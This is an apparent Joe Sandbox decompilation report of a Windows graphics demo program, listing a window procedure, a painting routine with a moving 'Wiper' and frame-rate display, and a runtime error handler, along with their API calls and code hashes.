                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                			}


















                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c1272c
                                                                                                0x00c12732
                                                                                                0x00c12734
                                                                                                0x00c12734
                                                                                                0x00c12b75
                                                                                                0x00c12b7a
                                                                                                0x00c12b80
                                                                                                0x00c12b86
                                                                                                0x00c12b8c
                                                                                                0x00c12b92
                                                                                                0x00c12b98
                                                                                                0x00c12b9f
                                                                                                0x00c12ba6
                                                                                                0x00c12bad
                                                                                                0x00c12bb4
                                                                                                0x00c12bbb
                                                                                                0x00c12bc2
                                                                                                0x00c12bc3
                                                                                                0x00c12bcc
                                                                                                0x00c12bd4
                                                                                                0x00c12bdc
                                                                                                0x00c12be7
                                                                                                0x00c12bf1
                                                                                                0x00c12bf6
                                                                                                0x00c12bfb
                                                                                                0x00c12c05
                                                                                                0x00c12c0f
                                                                                                0x00c12c14
                                                                                                0x00c12c1a
                                                                                                0x00c12c1f
                                                                                                0x00c12c2b
                                                                                                0x00c12c30
                                                                                                0x00c12c32
                                                                                                0x00c12c3a
                                                                                                0x00c12c45
                                                                                                0x00c12c52
                                                                                                0x00c12c54
                                                                                                0x00c12c56
                                                                                                0x00c12c5b
                                                                                                0x00c12c6f

                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00C12C25
                                                                                                • _crt_debugger_hook.MSVCR90(00000001), ref: 00C12C32
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C12C3A
                                                                                                • UnhandledExceptionFilter.KERNEL32(00C14254), ref: 00C12C45
                                                                                                • _crt_debugger_hook.MSVCR90(00000001), ref: 00C12C56
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00C12C61
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C12C68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 3369434319-0
                                                                                                • Opcode ID: 94ba875b617978d77ab22ed9a7bd25b07491e21a9467eba8b402f2e18a90f439
                                                                                                • Instruction ID: 59bbf85b3b7af2a8cc4db606e1224606f3967854976eae17940ff2feeacac1f5
                                                                                                • Opcode Fuzzy Hash: 94ba875b617978d77ab22ed9a7bd25b07491e21a9467eba8b402f2e18a90f439
                                                                                                • Instruction Fuzzy Hash: C221CCB4801204EFCB51DF25E8487CC3BB4BB0F315F21C15AE90987262E7B19A85DF59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 59%
                                                                                                			E00C113AF(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
                                                                                                				intOrPtr _t104;
                                                                                                				void* _t105;
                                                                                                				signed int _t114;
                                                                                                				intOrPtr _t117;
                                                                                                				struct HRGN__* _t120;
                                                                                                				signed int _t128;
                                                                                                				void* _t148;
                                                                                                				void* _t150;
                                                                                                				CHAR* _t151;
                                                                                                				int _t152;
                                                                                                				int _t154;
                                                                                                				void* _t159;
                                                                                                				signed int _t160;
                                                                                                				intOrPtr _t177;
                                                                                                				struct HDC__* _t178;
                                                                                                				int _t180;
                                                                                                				intOrPtr _t181;
                                                                                                				void* _t187;
                                                                                                				void* _t188;
                                                                                                				long long* _t189;
                                                                                                				long long* _t190;
                                                                                                				void* _t208;
                                                                                                
                                                                                                				_push(0x10c);
                                                                                                				E00C130B8(E00C1339A, __ebx, __edi, __esi);
                                                                                                				GetClientRect( *(_t187 + 8), _t187 - 0x28);
                                                                                                				_t177 =  *((intOrPtr*)(_t187 - 0x1c));
                                                                                                				_t180 =  *(_t187 - 0x24);
                                                                                                				 *((intOrPtr*)(_t187 - 0x10)) =  *((intOrPtr*)(_t187 - 0x20)) -  *(_t187 - 0x28);
                                                                                                				asm("fild dword [ebp-0x10]");
                                                                                                				 *((intOrPtr*)(_t187 - 0x10)) = _t177 - _t180;
                                                                                                				 *((long long*)(_t187 - 0x38)) = __fp0;
                                                                                                				_t104 =  *0xc16050; // 0x177
                                                                                                				asm("fild dword [ebp-0x10]");
                                                                                                				 *((long long*)(_t187 - 0x40)) = __fp0;
                                                                                                				asm("fchs");
                                                                                                				asm("fxch st0, st1");
                                                                                                				_t208 = st1 - st2;
                                                                                                				asm("fild dword [0xc16050]");
                                                                                                				if(_t104 < 0) {
                                                                                                					_t208 = _t208 +  *0xc14438;
                                                                                                				}
                                                                                                				asm("fdivp st1, st0");
                                                                                                				asm("fimul dword [0xc165a8]");
                                                                                                				asm("faddp st1, st0");
                                                                                                				_t105 = E00C13140(_t104, _t208);
                                                                                                				 *(_t187 - 0x14) = _t105;
                                                                                                				asm("fiadd dword [ebp-0x14]");
                                                                                                				 *(_t187 - 0x50) = _t105;
                                                                                                				 *(_t187 - 0x4c) = _t180;
                                                                                                				_t181 = E00C13140(_t105, _t208);
                                                                                                				 *((intOrPtr*)(_t187 - 0x44)) = _t177;
                                                                                                				_t178 =  *(_t187 + 0xc);
                                                                                                				 *((intOrPtr*)(_t187 - 0x48)) = _t181;
                                                                                                				 *((intOrPtr*)(_t187 - 0x10)) = 0x99ff;
                                                                                                				if( *0xc1603c != 0) {
                                                                                                					_t178 = E00C11271( *(_t187 + 8));
                                                                                                					 *((intOrPtr*)(_t187 - 0x10)) = 0x8e48;
                                                                                                				}
                                                                                                				FillRect(_t178, _t187 - 0x28, GetStockObject(0));
                                                                                                				 *(_t187 - 0x18) = CreateRectRgnIndirect(_t187 - 0x28);
                                                                                                				asm("cdq");
                                                                                                				_t160 = 3;
                                                                                                				_t114 = (_t181 -  *(_t187 - 0x14)) / _t160;
                                                                                                				 *((intOrPtr*)(_t187 - 0x6c)) =  *((intOrPtr*)(_t187 - 0x44));
                                                                                                				 *(_t187 - 0x64) =  *(_t187 - 0x4c);
                                                                                                				_t117 =  *((intOrPtr*)(_t187 - 0x20));
                                                                                                				 *((intOrPtr*)(_t187 - 0x60)) = _t117;
                                                                                                				 *((intOrPtr*)(_t187 - 0x58)) = _t117;
                                                                                                				 *((intOrPtr*)(_t187 - 0x54)) =  *((intOrPtr*)(_t187 - 0x1c));
                                                                                                				 *(_t187 - 0x70) =  *(_t187 - 0x14) + _t114;
                                                                                                				 *((intOrPtr*)(_t187 - 0x68)) = _t181 - _t114;
                                                                                                				 *(_t187 - 0x5c) =  *(_t187 - 0x24);
                                                                                                				_t120 = CreatePolygonRgn(_t187 - 0x70, 4, 1);
                                                                                                				 *(_t187 - 0x14) = _t120;
                                                                                                				CombineRgn( *(_t187 - 0x18),  *(_t187 - 0x18), _t120, 4);
                                                                                                				 *(_t187 - 0x2c) = SaveDC( *(_t187 + 0xc));
                                                                                                				SelectObject(_t178,  *0xc165c0);
                                                                                                				SelectObject(_t178, GetStockObject(0));
                                                                                                				_t189 = _t188 - 0x10;
                                                                                                				 *((long long*)(_t189 + 8)) =  *((long long*)(_t187 - 0x40));
                                                                                                				 *_t189 =  *((long long*)(_t187 - 0x38));
                                                                                                				_t128 = E00C1186A(0xc165f4);
                                                                                                				_t190 = _t189 + 0xc;
                                                                                                				 *((long long*)(_t190 + 8)) =  *((long long*)(_t187 - 0x40));
                                                                                                				 *_t190 =  *((long long*)(_t187 - 0x38));
                                                                                                				E00C1186A(0xc16610, _t178,  *(_t187 - 0x18), (_t128 & 0xffffff00 |  *0xc1603d == 0x00000000) & 0x000000ff, _t178,  *(_t187 - 0x14),  *0xc1603d & 0x000000ff);
                                                                                                				RestoreDC( *(_t187 + 0xc),  *(_t187 - 0x2c));
                                                                                                				DeleteObject( *(_t187 - 0x14));
                                                                                                				DeleteObject( *(_t187 - 0x18));
                                                                                                				E00C116A2(E00C119A1(_t187 - 0x50, _t178,  *((intOrPtr*)(_t187 - 0x10))), (_t181 -  *(_t187 - 0x14)) % _t160,  *((long long*)(_t187 - 0x38)));
                                                                                                				SetBkMode(_t178, 1);
                                                                                                				DrawTextA(_t178, " -  Hold Left Mouse Button down on window to pause screen updates.\n -  Drag with Left Mouse Button to move the Wiper right and left.\n -  Right Click to toggle painting mode.  Wiper color indicates mode:\n        Green:  Paint indirectly using a double buffer\n        Orange: Paint directly to the display", 0xffffffff, _t187 - 0x28, 0);
                                                                                                				_t159 = 3;
                                                                                                				__imp__??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z(GetStockObject, 1);
                                                                                                				 *(_t187 - 4) =  *(_t187 - 4) & 0x00000000;
                                                                                                				 *((intOrPtr*)(_t187 +  *((intOrPtr*)( *((intOrPtr*)(_t187 - 0x118)) + 4)) - 0x118 + 0x10)) = 0x2000;
                                                                                                				 *((long long*)(_t190 + 0x1c - 0xc + 4)) =  *0xc165b8;
                                                                                                				 *((intOrPtr*)(_t187 +  *((intOrPtr*)( *((intOrPtr*)(_t187 - 0x118)) + 4)) - 0x118 + 0x14)) = GetStockObject;
                                                                                                				_t148 = E00C11EAD(_t159, _t178, DrawTextA,  *0xc1603d);
                                                                                                				__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z(_t187 - 0x110, "FrameRate: ", " FPS");
                                                                                                				E00C11EAD(_t159, _t178, DrawTextA,  *0xc1603d);
                                                                                                				_t150 = _t187 - 0x8c;
                                                                                                				__imp__?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ(_t150, _t148);
                                                                                                				if( *((intOrPtr*)(_t150 + 0x18)) < 0x10) {
                                                                                                					_t151 = _t150 + 4;
                                                                                                					__eflags = _t151;
                                                                                                				} else {
                                                                                                					_t151 =  *(_t150 + 4);
                                                                                                				}
                                                                                                				_t152 = DrawTextA(_t178, _t151, 0xffffffff, _t187 - 0x28, 0x6a);
                                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                                				if( *0xc1603c != 0) {
                                                                                                					_t154 = E00C13140(_t152,  *((long long*)(_t187 - 0x40)));
                                                                                                					_t152 = BitBlt( *(_t187 + 0xc),  *(_t187 - 0x28),  *(_t187 - 0x24), E00C13140(_t154,  *((long long*)(_t187 - 0x38))), _t154, _t178, 0, 0, 0xcc0020);
                                                                                                				}
                                                                                                				 *(_t187 - 4) =  *(_t187 - 4) | 0xffffffff;
                                                                                                				__imp__??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ();
                                                                                                				return E00C13121(_t152);
                                                                                                			}

























                                                                                                0x00c113af
                                                                                                0x00c113b9
                                                                                                0x00c113c5
                                                                                                0x00c113d1
                                                                                                0x00c113d4
                                                                                                0x00c113d7
                                                                                                0x00c113da
                                                                                                0x00c113e1
                                                                                                0x00c113e4
                                                                                                0x00c113e7
                                                                                                0x00c113ec
                                                                                                0x00c113ef
                                                                                                0x00c11404
                                                                                                0x00c11406
                                                                                                0x00c11408
                                                                                                0x00c1140a
                                                                                                0x00c11412
                                                                                                0x00c11414
                                                                                                0x00c11414
                                                                                                0x00c1141a
                                                                                                0x00c1141c
                                                                                                0x00c11422
                                                                                                0x00c11424
                                                                                                0x00c11429
                                                                                                0x00c1142c
                                                                                                0x00c1142f
                                                                                                0x00c11432
                                                                                                0x00c11441
                                                                                                0x00c11443
                                                                                                0x00c11446
                                                                                                0x00c11449
                                                                                                0x00c1144c
                                                                                                0x00c11453
                                                                                                0x00c1145e
                                                                                                0x00c11460
                                                                                                0x00c11460
                                                                                                0x00c11477
                                                                                                0x00c11487
                                                                                                0x00c11491
                                                                                                0x00c11492
                                                                                                0x00c11493
                                                                                                0x00c114a3
                                                                                                0x00c114a9
                                                                                                0x00c114ac
                                                                                                0x00c114af
                                                                                                0x00c114b2
                                                                                                0x00c114b8
                                                                                                0x00c114bb
                                                                                                0x00c114c5
                                                                                                0x00c114c8
                                                                                                0x00c114cb
                                                                                                0x00c114d7
                                                                                                0x00c114dd
                                                                                                0x00c114f9
                                                                                                0x00c114fc
                                                                                                0x00c11504
                                                                                                0x00c11510
                                                                                                0x00c11513
                                                                                                0x00c1151a
                                                                                                0x00c11527
                                                                                                0x00c1152f
                                                                                                0x00c11539
                                                                                                0x00c11543
                                                                                                0x00c11553
                                                                                                0x00c11561
                                                                                                0x00c11570
                                                                                                0x00c11575
                                                                                                0x00c11585
                                                                                                0x00c1158d
                                                                                                0x00c115a7
                                                                                                0x00c115ad
                                                                                                0x00c115b5
                                                                                                0x00c115bb
                                                                                                0x00c115d5
                                                                                                0x00c115f4
                                                                                                0x00c115f8
                                                                                                0x00c11607
                                                                                                0x00c11611
                                                                                                0x00c11618
                                                                                                0x00c1161f
                                                                                                0x00c1162c
                                                                                                0x00c11636
                                                                                                0x00c1163d
                                                                                                0x00c1163d
                                                                                                0x00c11638
                                                                                                0x00c11638
                                                                                                0x00c11638
                                                                                                0x00c1164a
                                                                                                0x00c11652
                                                                                                0x00c1165f
                                                                                                0x00c1166e
                                                                                                0x00c11686
                                                                                                0x00c11686
                                                                                                0x00c1168c
                                                                                                0x00c11696
                                                                                                0x00c116a1

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00C113B9
                                                                                                • GetClientRect.USER32 ref: 00C113C5
                                                                                                • GetStockObject.GDI32(00000000), ref: 00C1146F
                                                                                                • FillRect.USER32 ref: 00C11477
                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 00C11481
                                                                                                • CreatePolygonRgn.GDI32(00000004,00000004,00000001), ref: 00C114CB
                                                                                                • CombineRgn.GDI32(?,?,00000000,00000004), ref: 00C114DD
                                                                                                • SaveDC.GDI32(?), ref: 00C114E6
                                                                                                • SelectObject.GDI32(?), ref: 00C114FC
                                                                                                • GetStockObject.GDI32(00000000), ref: 00C11500
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00C11504
                                                                                                  • Part of subcall function 00C1186A: SaveDC.GDI32(?), ref: 00C11878
                                                                                                  • Part of subcall function 00C1186A: SelectClipRgn.GDI32(?,?), ref: 00C11887
                                                                                                  • Part of subcall function 00C1186A: _invalid_parameter_noinfo.MSVCR90 ref: 00C118A9
                                                                                                  • Part of subcall function 00C1186A: SelectObject.GDI32(?,?), ref: 00C118C6
                                                                                                  • Part of subcall function 00C1186A: Ellipse.GDI32(?,00000000,00000000,00000000,00000000), ref: 00C11928
                                                                                                  • Part of subcall function 00C1186A: Rectangle.GDI32(?,00000000,00000000,00000000,00000000), ref: 00C1197D
                                                                                                  • Part of subcall function 00C1186A: RestoreDC.GDI32(?,?), ref: 00C11996
                                                                                                • RestoreDC.GDI32(?,?), ref: 00C11561
                                                                                                • DeleteObject.GDI32(?), ref: 00C11570
                                                                                                • DeleteObject.GDI32(?), ref: 00C11575
                                                                                                  • Part of subcall function 00C119A1: CreateCompatibleDC.GDI32(?), ref: 00C119BB
                                                                                                  • Part of subcall function 00C119A1: SelectObject.GDI32(?,00000000), ref: 00C119E0
                                                                                                  • Part of subcall function 00C119A1: AlphaBlend.MSIMG32(?,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 00C11A0C
                                                                                                  • Part of subcall function 00C119A1: DeleteDC.GDI32(?), ref: 00C11A15
                                                                                                  • Part of subcall function 00C116A2: GetTickCount64.KERNEL32 ref: 00C116B1
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00C1158D
                                                                                                • DrawTextA.USER32(?, - Hold Left Mouse Button down on window to pause screen updates. - Drag with Left Mouse Button to move the Wiper right and left. - Right Click to toggle painting mode. Wiper color indicates mode: Green: Paint indirectly using a double buffer ,000000FF,?,00000000), ref: 00C115A7
                                                                                                • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP90(00000003,00000001), ref: 00C115B5
                                                                                                  • Part of subcall function 00C11EAD: __EH_prolog3_catch.LIBCMT ref: 00C11EB4
                                                                                                  • Part of subcall function 00C11EAD: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP90(?,00000000), ref: 00C11F81
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z.MSVCP90 ref: 00C11611
                                                                                                  • Part of subcall function 00C11EAD: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP90(?,?,00000014,00C1160C,?,FrameRate: ), ref: 00C11F33
                                                                                                  • Part of subcall function 00C11EAD: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH@Z.MSVCP90(?,?,?,00000014,00C1160C,?,FrameRate: ), ref: 00C11F55
                                                                                                  • Part of subcall function 00C11EAD: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP90(?), ref: 00C11FBB
                                                                                                • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP90(?), ref: 00C1162C
                                                                                                • DrawTextA.USER32(?,-00000004,000000FF,?,0000006A), ref: 00C1164A
                                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00C11652
                                                                                                • BitBlt.GDI32(?,?,?,00000000,00000000,?,00000000,00000000,00CC0020), ref: 00C11686
                                                                                                • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP90 ref: 00C11696
                                                                                                Strings
                                                                                                • FrameRate: , xrefs: 00C11601
                                                                                                • - Hold Left Mouse Button down on window to pause screen updates. - Drag with Left Mouse Button to move the Wiper right and left. - Right Click to toggle painting mode. Wiper color indicates mode: Green: Paint indirectly using a double buffer , xrefs: 00C115A1
                                                                                                • FPS, xrefs: 00C115E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: U?$char_traits@$Object$D@std@@D@std@@@std@@SelectV?$allocator@$D@2@@std@@$CreateDeleteRect$?sputc@?$basic_streambuf@DrawRestoreSaveStockText$??0?$basic_stringstream@??1?$basic_string@??6?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?str@?$basic_stringstream@AlphaBlendClientClipCombineCompatibleCount64D?$basic_stringstream@D@2@@2@EllipseFillH_prolog3H_prolog3_catchIndirectModePolygonRectangleTickV01@V?$basic_string@_invalid_parameter_noinfo
                                                                                                • String ID: - Hold Left Mouse Button down on window to pause screen updates. - Drag with Left Mouse Button to move the Wiper right and left. - Right Click to toggle painting mode. Wiper color indicates mode: Green: Paint indirectly using a double buffer $ FPS$FrameRate:
                                                                                                • API String ID: 4093834667-1027468517
                                                                                                • Opcode ID: 69d3e97cb03abbe5c4405062e4239594223c889a0303eaaba0cd614a0c41d1b1
                                                                                                • Instruction ID: d30d96cb1c1ac9b74cbbf6e53ac4d61ea93ce59499565cd6c7905a83bc34e87f
                                                                                                • Opcode Fuzzy Hash: 69d3e97cb03abbe5c4405062e4239594223c889a0303eaaba0cd614a0c41d1b1
                                                                                                • Instruction Fuzzy Hash: 3E913AB1D00218AFDB059FA5EC49BEDBBB4FB0A310F158059F605A22A0DB319A95DF60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 133 c124a9-c124cd 134 c124d3 133->134 135 c125c6-c125cd 133->135 136 c125a1-c125a8 134->136 137 c124d9-c124dc 134->137 138 c125d3-c125d4 135->138 139 c126af-c126b6 135->139 142 c126df 136->142 143 c125ae-c125b5 136->143 140 c124e2-c124e3 137->140 141 c1258c-c1259c SetTimer 137->141 144 c12679-c126ad SetCapture 138->144 145 c125da-c125db 138->145 139->142 146 c126b8-c126d8 call c112e2 139->146 147 c124e9-c124ec 140->147 148 c1257f-c12587 PostQuitMessage 140->148 141->142 153 c126e1-c126f2 call c1272c 142->153 143->142 149 c125bb-c125c1 call c11340 143->149 144->142 150 c125e1-c125e3 145->150 151 c1266a-c12677 ReleaseCapture 145->151 167 c126de 146->167 155 c124f2-c124f5 147->155 156 c125ed call c1122b 147->156 148->142 149->167 158 c125e5-c125e6 150->158 159 c1265a-c12668 SetCapture 150->159 151->142 162 c124f7-c124fa 155->162 163 c12559-c1257a BeginPaint call c113af EndPaint 155->163 173 c125f2-c125f9 156->173 165 c125e8-c125eb 158->165 166 c125fe-c12605 158->166 159->142 171 c12551-c12554 162->171 172 c124fc-c12501 162->172 163->142 165->156 165->173 169 c12607-c1262d GetClientRect PtInRect 166->169 170 c1264e-c12655 166->170 167->142 169->170 176 c1262f-c12641 ReleaseCapture 169->176 170->142 171->153 172->173 177 c12507-c1250e 172->177 175 c1251e-c12525 DefWindowProcW 173->175 175->153 176->170 179 c12643-c12649 call c1122b 176->179 180 c12510-c12511 177->180 181 c12536-c1254c DialogBoxParamW 177->181 179->170 183 c12513-c12519 180->183 184 c1252a-c12531 DestroyWindow 180->184 181->142 183->175 184->142
                                                                                                C-Code - Quality: 75%
                                                                                                			E00C124A9(void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                				signed int _v8;
                                                                                                				struct tagPAINTSTRUCT _v76;
                                                                                                				struct tagRECT _v92;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t20;
                                                                                                				int _t24;
                                                                                                				long _t25;
                                                                                                				void* _t27;
                                                                                                				int _t28;
                                                                                                				signed int _t30;
                                                                                                				int _t31;
                                                                                                				int _t34;
                                                                                                				int _t36;
                                                                                                				signed short _t37;
                                                                                                				int _t42;
                                                                                                				int _t44;
                                                                                                				void* _t50;
                                                                                                				void* _t52;
                                                                                                				void* _t53;
                                                                                                				void* _t54;
                                                                                                				void* _t60;
                                                                                                				void* _t64;
                                                                                                				void* _t68;
                                                                                                				void* _t69;
                                                                                                				signed int _t71;
                                                                                                				unsigned int _t76;
                                                                                                				unsigned int _t77;
                                                                                                				signed int _t78;
                                                                                                				void* _t81;
                                                                                                				struct HWND__* _t83;
                                                                                                				void* _t84;
                                                                                                				intOrPtr _t86;
                                                                                                				void* _t87;
                                                                                                				void* _t90;
                                                                                                				signed int _t93;
                                                                                                				void* _t96;
                                                                                                
                                                                                                				_t95 = (_t93 & 0xfffffff8) - 0x5c;
                                                                                                				_t20 =  *0xc16018; // 0x4f3fb031
                                                                                                				_v8 = _t20 ^ (_t93 & 0xfffffff8) - 0x0000005c;
                                                                                                				_push(_t68);
                                                                                                				_t86 = _a8;
                                                                                                				_t83 = _a4;
                                                                                                				_t96 = _t86 - 0x113;
                                                                                                				if(_t96 > 0) {
                                                                                                					_t24 = _t86 - 0x200;
                                                                                                					__eflags = _t24;
                                                                                                					if(_t24 == 0) {
                                                                                                						__eflags =  *0xc165dc;
                                                                                                						if( *0xc165dc == 0) {
                                                                                                							L40:
                                                                                                							_t25 = 0;
                                                                                                							__eflags = 0;
                                                                                                							L41:
                                                                                                							_pop(_t84);
                                                                                                							_pop(_t87);
                                                                                                							_pop(_t69);
                                                                                                							return E00C1272C(_t25, _t69, _v8 ^ _t95, _t81, _t84, _t87);
                                                                                                						}
                                                                                                						_t90 = (_a16 & 0x0000ffff) -  *0xc165e8 +  *0xc165f0;
                                                                                                						_t27 = E00C112E2(__fp0, _t83, _t90);
                                                                                                						 *0xc165e8 =  *0xc165e8 + _t27;
                                                                                                						__eflags =  *0xc165e8;
                                                                                                						 *0xc165f0 = _t90 - _t27;
                                                                                                						L39:
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t28 = _t24 - 1;
                                                                                                					__eflags = _t28;
                                                                                                					if(_t28 == 0) {
                                                                                                						SetCapture(_t83);
                                                                                                						_t76 = _a16;
                                                                                                						_t30 = _t76 & 0x0000ffff;
                                                                                                						_t77 = _t76 >> 0x10;
                                                                                                						 *0xc165f0 =  *0xc165f0 & 0x00000000;
                                                                                                						 *0xc165e0 = _t30;
                                                                                                						 *0xc165e4 = _t77;
                                                                                                						 *0xc165e8 = _t30;
                                                                                                						 *0xc165ec = _t77;
                                                                                                						 *0xc165dc = 1;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t31 = _t28 - 1;
                                                                                                					__eflags = _t31;
                                                                                                					if(_t31 == 0) {
                                                                                                						ReleaseCapture();
                                                                                                						 *0xc165dc = 0;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t34 = _t31;
                                                                                                					__eflags = _t34;
                                                                                                					if(_t34 == 0) {
                                                                                                						SetCapture(_t83);
                                                                                                						 *0xc165dd = 1;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t36 = _t34 - 1;
                                                                                                					__eflags = _t36;
                                                                                                					if(_t36 == 0) {
                                                                                                						__eflags =  *0xc165dd;
                                                                                                						if( *0xc165dd != 0) {
                                                                                                							_t37 = _a16;
                                                                                                							GetClientRect(_t83,  &_v92);
                                                                                                							_push(_t37 >> 0x10);
                                                                                                							_t42 = PtInRect( &_v92, _t37 & 0x0000ffff);
                                                                                                							__eflags = _t42;
                                                                                                							if(_t42 != 0) {
                                                                                                								ReleaseCapture();
                                                                                                								_t44 =  *0xc1603c; // 0x1
                                                                                                								__eflags = _t44;
                                                                                                								_t78 = _t71 & 0xffffff00 | _t44 == 0x00000000;
                                                                                                								__eflags = _t44 - _t78;
                                                                                                								if(_t44 != _t78) {
                                                                                                									 *0xc1603c = _t78;
                                                                                                									E00C1122B();
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						 *0xc165dd = 0;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					__eflags = _t36 != 0xf;
                                                                                                					if(_t36 != 0xf) {
                                                                                                						L28:
                                                                                                						_push(_a16);
                                                                                                						_push(_a12);
                                                                                                						_push(_t86);
                                                                                                						L11:
                                                                                                						_t25 = DefWindowProcW(_t83, ??, ??, ??);
                                                                                                						goto L41;
                                                                                                					}
                                                                                                					L27:
                                                                                                					E00C1122B();
                                                                                                					goto L28;
                                                                                                				}
                                                                                                				if(_t96 == 0) {
                                                                                                					__eflags = _a12 - 0x7db;
                                                                                                					if(_a12 != 0x7db) {
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					__eflags =  *0xc165dc;
                                                                                                					if( *0xc165dc != 0) {
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					E00C11340(_t71, __fp0, _t83);
                                                                                                					goto L39;
                                                                                                				}
                                                                                                				_t50 = _t86 - 1;
                                                                                                				if(_t50 == 0) {
                                                                                                					SetTimer(_t83, 0x7db, 0xd, 0);
                                                                                                					goto L40;
                                                                                                				}
                                                                                                				_t52 = _t50 - 1;
                                                                                                				if(_t52 == 0) {
                                                                                                					PostQuitMessage(0);
                                                                                                					goto L40;
                                                                                                				}
                                                                                                				_t53 = _t52 - 3;
                                                                                                				if(_t53 == 0) {
                                                                                                					goto L27;
                                                                                                				}
                                                                                                				_t54 = _t53 - 0xa;
                                                                                                				if(_t54 == 0) {
                                                                                                					_push(BeginPaint(_t83,  &_v76));
                                                                                                					_push(_t83);
                                                                                                					E00C113AF(_t68, _t83, _t86, __eflags, __fp0);
                                                                                                					EndPaint(_t83,  &_v76);
                                                                                                					goto L40;
                                                                                                				}
                                                                                                				_t60 = _t54 - 5;
                                                                                                				if(_t60 == 0) {
                                                                                                					_t25 = 1;
                                                                                                					goto L41;
                                                                                                				}
                                                                                                				if(_t60 != 0xfd) {
                                                                                                					goto L28;
                                                                                                				}
                                                                                                				_t64 = (_a12 & 0x0000ffff) - 0x68;
                                                                                                				if(_t64 == 0) {
                                                                                                					DialogBoxParamW( *0xc1640c, 0x67, _t83, E00C126F5, 0);
                                                                                                					goto L40;
                                                                                                				}
                                                                                                				if(_t64 == 1) {
                                                                                                					DestroyWindow(_t83);
                                                                                                					goto L40;
                                                                                                				} else {
                                                                                                					_push(_a16);
                                                                                                					_push(_a12);
                                                                                                					_push(0x111);
                                                                                                					goto L11;
                                                                                                				}
                                                                                                			}










































                                                                                                0x00c124af
                                                                                                0x00c124b2
                                                                                                0x00c124b9
                                                                                                0x00c124bd
                                                                                                0x00c124bf
                                                                                                0x00c124c8
                                                                                                0x00c124cb
